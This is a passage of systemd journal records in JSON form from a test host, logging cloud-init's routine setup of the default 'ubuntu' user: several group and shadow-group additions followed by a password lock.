"_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'dialout'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817308855" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=276;b=e2b08827b5804427b422c10c84f1567e;m=29085fd;t=5bd16df540565;x=eb66e0fb53002cec", "__REALTIME_TIMESTAMP" : "1615280817309029", "__MONOTONIC_TIMESTAMP" : 
"43025917", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'cdrom'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817309021" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=277;b=e2b08827b5804427b422c10c84f1567e;m=2908694;t=5bd16df5405fb;x=64c01cd95089e67f", "__REALTIME_TIMESTAMP" : "1615280817309179", "__MONOTONIC_TIMESTAMP" : "43026068", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'floppy'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817309172" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=278;b=e2b08827b5804427b422c10c84f1567e;m=2908715;t=5bd16df54067d;x=63b1f647f6212e20", "__REALTIME_TIMESTAMP" : "1615280817309309", "__MONOTONIC_TIMESTAMP" : "43026197", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'sudo'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817309302" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=279;b=e2b08827b5804427b422c10c84f1567e;m=2908797;t=5bd16df5406ff;x=f6a00f782b9ab0be", "__REALTIME_TIMESTAMP" : "1615280817309439", "__MONOTONIC_TIMESTAMP" : "43026327", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo 
video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'audio'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817309432" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=27a;b=e2b08827b5804427b422c10c84f1567e;m=2908835;t=5bd16df54079d;x=5ac4c98ae56706a4", "__REALTIME_TIMESTAMP" : "1615280817309597", "__MONOTONIC_TIMESTAMP" : "43026485", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'dip'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817309589" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=27b;b=e2b08827b5804427b422c10c84f1567e;m=29088c1;t=5bd16df540828;x=3791b49dc7fdc319", "__REALTIME_TIMESTAMP" : "1615280817309736", "__MONOTONIC_TIMESTAMP" : "43026625", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", 
"_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'video'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817309729" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=27c;b=e2b08827b5804427b422c10c84f1567e;m=2908946;t=5bd16df5408ad;x=f662af4b76fbe91a", "__REALTIME_TIMESTAMP" : "1615280817309869", "__MONOTONIC_TIMESTAMP" : "43026758", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'plugdev'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817309862" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=27d;b=e2b08827b5804427b422c10c84f1567e;m=29089cc;t=5bd16df540934;x=1f3068894cde168a", "__REALTIME_TIMESTAMP" : "1615280817310004", "__MONOTONIC_TIMESTAMP" : "43026892", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : 
"b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'lxd'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817309997" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=27e;b=e2b08827b5804427b422c10c84f1567e;m=2908a4c;t=5bd16df5409b4;x=4f2b7d9150228540", "__REALTIME_TIMESTAMP" : "1615280817310132", "__MONOTONIC_TIMESTAMP" : "43027020", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to group 'netdev'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817310125" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=27f;b=e2b08827b5804427b422c10c84f1567e;m=2908ae3;t=5bd16df540a4a;x=6ccc14c1c1ab2dd3", "__REALTIME_TIMESTAMP" : "1615280817310282", "__MONOTONIC_TIMESTAMP" : "43027171", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", 
"_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'adm'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817310275" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=280;b=e2b08827b5804427b422c10c84f1567e;m=2908b84;t=5bd16df540aec;x=751261d8bc9cc011", "__REALTIME_TIMESTAMP" : "1615280817310444", "__MONOTONIC_TIMESTAMP" : "43027332", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'dialout'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817310435" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=281;b=e2b08827b5804427b422c10c84f1567e;m=2908c12;t=5bd16df540b79;x=cc3b0e05082a5fcc", "__REALTIME_TIMESTAMP" : "1615280817310585", "__MONOTONIC_TIMESTAMP" : "43027474", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", 
"_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'cdrom'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817310578" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=282;b=e2b08827b5804427b422c10c84f1567e;m=2908c94;t=5bd16df540bfb;x=785dfbc3f11eaeb2", "__REALTIME_TIMESTAMP" : "1615280817310715", "__MONOTONIC_TIMESTAMP" : "43027604", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'floppy'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817310709" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=283;b=e2b08827b5804427b422c10c84f1567e;m=2908d1a;t=5bd16df540c81;x=e008fd5bb62252ab", "__REALTIME_TIMESTAMP" : "1615280817310849", 
"__MONOTONIC_TIMESTAMP" : "43027738", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'sudo'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817310842" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=284;b=e2b08827b5804427b422c10c84f1567e;m=2908d9e;t=5bd16df540d05;x=e89d6773cff887e1", "__REALTIME_TIMESTAMP" : "1615280817310981", "__MONOTONIC_TIMESTAMP" : "43027870", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'audio'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817310974" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=285;b=e2b08827b5804427b422c10c84f1567e;m=2908e20;t=5bd16df540d87;x=18af57c4ba9c414f", "__REALTIME_TIMESTAMP" : "1615280817311111", "__MONOTONIC_TIMESTAMP" : "43028000", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'dip'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817311105" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=286;b=e2b08827b5804427b422c10c84f1567e;m=2908ef8;t=5bd16df540e60;x=efc5bf646a38b30a", "__REALTIME_TIMESTAMP" : "1615280817311328", "__MONOTONIC_TIMESTAMP" : "43028216", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev 
sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'video'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817311319" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=287;b=e2b08827b5804427b422c10c84f1567e;m=2908f88;t=5bd16df540eef;x=3d2956e132d9a7aa", "__REALTIME_TIMESTAMP" : "1615280817311471", "__MONOTONIC_TIMESTAMP" : "43028360", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'plugdev'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817311463" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=288;b=e2b08827b5804427b422c10c84f1567e;m=2909019;t=5bd16df540f80;x=6db6906e2b974e45", "__REALTIME_TIMESTAMP" : "1615280817311616", "__MONOTONIC_TIMESTAMP" : "43028505", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", 
"_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'lxd'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817311609" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=289;b=e2b08827b5804427b422c10c84f1567e;m=290909d;t=5bd16df541004;x=7439e56038c0c4bf", "__REALTIME_TIMESTAMP" : "1615280817311748", "__MONOTONIC_TIMESTAMP" : "43028637", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "useradd", "SYSLOG_PID" : "733", "_PID" : "733", "_COMM" : "useradd", "_EXE" : "/usr/sbin/useradd", "_CMDLINE" : "useradd ubuntu --comment Ubuntu --groups adm audio cdrom dialout dip floppy lxd netdev plugdev sudo video --shell /bin/bash -m", "MESSAGE" : "add 'ubuntu' to shadow group 'netdev'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817311741" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=28a;b=e2b08827b5804427b422c10c84f1567e;m=2933baf;t=5bd16df56bb16;x=1b509b93a3ec76a9", "__REALTIME_TIMESTAMP" : "1615280817486614", "__MONOTONIC_TIMESTAMP" : "43203503", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", 
"_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "SYSLOG_FACILITY" : "10", "SYSLOG_IDENTIFIER" : "passwd", "SYSLOG_PID" : "740", "MESSAGE" : "password for 'ubuntu' changed by 'root'", "_PID" : "740", "_COMM" : "passwd", "_EXE" : "/usr/bin/passwd", "_CMDLINE" : "passwd -l ubuntu", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817486592" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=28b;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=5ca7bdd0ee6da0a6", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : 